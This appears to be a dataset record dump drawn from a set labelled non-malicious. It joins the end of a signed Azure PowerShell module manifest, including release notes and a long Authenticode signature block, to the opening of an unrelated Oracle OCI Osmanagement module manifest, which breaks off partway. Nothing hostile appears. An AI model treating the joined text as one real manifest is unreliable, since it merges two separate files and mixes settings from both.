# A URL to the main website for this project.
ProjectUri = 'https://github.com/Azure/azure-powershell'
# A URL to an icon representing this module.
# IconUri = ''
# ReleaseNotes of this module
ReleaseNotes = '* Fixed an issue that ''Invoke-AzOperationalInsightsQuery'' timed out after 100 seconds. The timeout is now bound to the ''-Wait'' parameter. (#16553)
* Removed the outdated deps.json file.'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
# SIG # Begin signature block
# MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCSWMMU1iR8bCaH
# +Aap8Ux0nQylrzUmKmxIzpk9itOljaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFPHy9cLr7zn9R1ixqyZX7HX
# M634GYNROsFMnkte9lnYMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAnLN27CA/+x4SH55du+RDpqDYaxV8NbHb6Ew2g5ICIiWnOXwhx19s5oN9
# jXrRURuFv6kBOxKFmqQ8PECdVG8uZ9O6LyKwYMzgePlIXPGxwGRWyOC33BIq5iTq
# FVNJRPgqwBB94DFJDo0Q/o71r7Ie3jri12gfHYUCztiZzmXiSl40K4+ujY9zwakN
# q+FcZsmZab9bn8ci/vxdUJhxuu/PzaWchahE4Ms2oXR5dMPydOTF+fOPWUwx/g/G
# pHhMfLCGk/vruNzV1Ytp3RSPJEn4cwHlQAZvunBwE/hsm5YwZ91Ye7Tg6Nin8RLJ
# ZhzH69+El8llhZm6w4QukB8sB/+tyaGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC
# F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDtJZpFrRC2Vn+qZW5nHd1nx3qDVlIr2IGVtHxWnTyJNwIGZjOabFTg
# GBMyMDI0MDUxNjA3MjMzNC41MTNaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTYwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHtMIIHIDCCBQigAwIBAgITMwAAAe+JP1ahWMyo2gABAAAB7zANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# NDhaFw0yNTAzMDUxODQ1NDhaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTYwMC0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQCjC1jinwzgHwhOakZqy17oE4BIBKsm5kX4DUmCBWI0
# lFVpEiK5mZ2Kh59soL4ns52phFMQYGG5kypCipungwP9Nob4VGVE6aoMo5hZ9Nyt
# XR5ZRgb9Z8NR6EmLKICRhD4sojPMg/RnGRTcdf7/TYvyM10jLjmLyKEegMHfvIwP
# mM+AP7hzQLfExDdqCJ2u64Gd5XlnrFOku5U9jLOKk1y70c+Twt04/RLqruv1fGP8
# LmYmtHvrB4TcBsADXSmcFjh0VgQkX4zXFwqnIG8rgY+zDqJYQNZP8O1Yo4kSckHT
# 43XC0oM40ye2+9l/rTYiDFM3nlZe2jhtOkGCO6GqiTp50xI9ITpJXi0vEek8AejT
# 4PKMEO2bPxU63p63uZbjdN5L+lgIcCNMCNI0SIopS4gaVR4Sy/IoDv1vDWpe+I28
# /Ky8jWTeed0O3HxPJMZqX4QB3I6DnwZrHiKn6oE38tgBTCCAKvEoYOTg7r2lF0Iu
# bt/3+VPvKtTCUbZPFOG8jZt9q6AFodlvQntiolYIYtqSrLyXAQIlXGhZ4gNcv4dv
# 1YAilnbWA9CsnYh+OKEFr/4w4M69lI+yaoZ3L/t/UfXpT/+yc7hS/FolcmrGFJTB
# YlS4nE1cuKblwZ/UOG26SLhDONWXGZDKMJKN53oOLSSk4ldR0HlsbT4heLlWlOEl
# JQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFO1MWqKFwrCbtrw9P8A63bAVSJzLMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAYGZa3aCDudbk9EVdkP8xcQGZuIAIPRx9K
# 1CA7uRzBt80fC0aWkuYYhQMvHHJRHUobSM4Uw3zN7fHEN8hhaBDb9NRaGnFWdtHx
# mJ9eMz6Jpn6KiIyi9U5Og7QCTZMl17n2w4eddq5vtk4rRWOVvpiDBGJARKiXWB9u
# 2ix0WH2EMFGHqjIhjWUXhPgR4C6NKFNXHvWvXecJ2WXrJnvvQGXAfNJGETJZGpR4
# 1nUN3ijfiCSjFDxamGPsy5iYu904Hv9uuSXYd5m0Jxf2WNJSXkPGlNhrO27pPxgT
# 111myAR61S3S2hc572zN9yoJEObE98Vy5KEM3ZX53cLefN81F1C9p/cAKkE6u9V6
# ryyl/qSgxu1UqeOZCtG/iaHSKMoxM7Mq4SMFsPT/8ieOdwClYpcw0CjZe5KBx2xL
# a4B1neFib8J8/gSosjMdF3nHiyHx1YedZDtxSSgegeJsi0fbUgdzsVMJYvqVw52W
# qQNu0GRC79ZuVreUVKdCJmUMBHBpTp6VFopL0Jf4Srgg+zRD9iwbc9uZrn+89odp
# InbznYrnPKHiO26qe1ekNwl/d7ro2ItP/lghz0DoD7kEGeikKJWHdto7eVJoJhkr
# UcanTuUH08g+NYwG6S+PjBSB/NyNF6bHa/xR+ceAYhcjx0iBiv90Mn0JiGfnA2/h
# Lj5evhTcAjCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ
# MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjk2MDAtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBL
# cI81gxbea1Ex2mFbXx7ck+0g/6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6e/kajAiGA8yMDI0MDUxNjAxNDgy
# NloYDzIwMjQwNTE3MDE0ODI2WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDp7+Rq
# AgEAMAoCAQACAgS3AgH/MAcCAQACAhN0MAoCBQDp8TXqAgEAMDYGCisGAQQBhFkK
# BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ
# KoZIhvcNAQELBQADggEBALtBSk4n+rSTeMZQUhoJ92GGdhj/jk7xMXLu2WF7hT9p
# RDrcDzyuPb/LrKVcqHr4jQhbjki+rY8hL06zkH6nseJ4W068zeChPtNs0nsSbTn9
# fL7U3Q5uvHvrDEJFj6ivToez8EGBaaWb51Kly8UVOgxOTO3KwBHEs7ASmVVF9gpc
# dCFtHBgAUd43l6hy/lD4Gvmq4IsGPqhaqsHhRNDH2F+zUNNjXhRCJZ6P3WSCCQru
# var3pvQfoHziPJR+Xxe9ctl6PScXAGjGlDc8M3j7XOpxTK34C/cH5Rslt5NQXCcb
# bG4EqFc/jGvGhsnvCA8iS3LYRtbP6pOe0WWEB+QfGRwxggQNMIIECQIBATCBkzB8
# MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
# bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
# aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe+JP1ahWMyo2gABAAAB
# 7zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE
# MC8GCSqGSIb3DQEJBDEiBCDwJMf5hnNwcA6IgsevN4Ge2K8F3b+ObPbCrvcQtv2O
# JDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIPBhKEW4Fo3wUz09NQx2a0Db
# cdsX8jovM5LizHmnyX+jMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAHviT9WoVjMqNoAAQAAAe8wIgQgcg/hgnHklArzGbBkon+iztsk
# ir9etKkTtBy2hJg2l+MwDQYJKoZIhvcNAQELBQAEggIAd6WOEoSwbfm3k9JwfgL/
# M0IwJTJBH+h98d+IPlRusFa80Jxwe6Z7pPSFYc/2bXFqEX/OHLzKVbc53yGWs890
# xtC2XzJPBoQxbHnb5KGc2eTQiQQELZvYS6+zUErN8QHwUwb5/P/QujRMhhxf32aM
# upB8eux5aqIyODofXrEB+xqlRC9FffUhJRbjyczrkKDh42XMevIqD8IA50R9Qjn8
# wFaKHgTr855x2T5FDzSqIPdAisM4Z7PhRWUGngTos7pH7lyKlhSttpoTzt3ZKbBo
# JhhU+cdRVzomNRZ5ehq5VWDz8gUDdZR/Ym11rLrMPVQ5jU0q1omcKwDqfQZOTjLD
# nipeilhIZEar0+ivlUHnDCfjEvNMbWpPGdGtPJfY+TQ/c1IkI2Kh/s807wLWAug7
# IL5havkdlltYgKGj5fiwLxMxa9Tc70ejivS74XFcpSXqojZGvuv5hxcNJZnw5gzC
# HtmX21ktxzojoLZCN1UMgKHR0+0t615H2oUZ+XPH+TYkIspVbcJq2IoCUlC70Dwu
# BWIbdK3HEY6PDsY17/modlb1P7QSdwg+D5S3aWIUsYjnfHizTmF9wUxBfUkU6QEn
# 8uYa4Y+VRE5DmLqkAx5AcKXirtdV3D1HtwV1HB1bKkEMf4TxAM57/5ndy93AKkdP
# U7//yKUspiBmXUojZnE6qJY=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_46_24.ps1
|
sample_46_24.ps1
|
#
# Module manifest for module 'OCI.PSModules.Osmanagement'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Osmanagement.dll'
# Version number of this module.
ModuleVersion = '73.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '08aa2c02-1476-4491-ace6-a15dc5ef7b7f'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Osmanagement Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '73.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Osmanagement.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
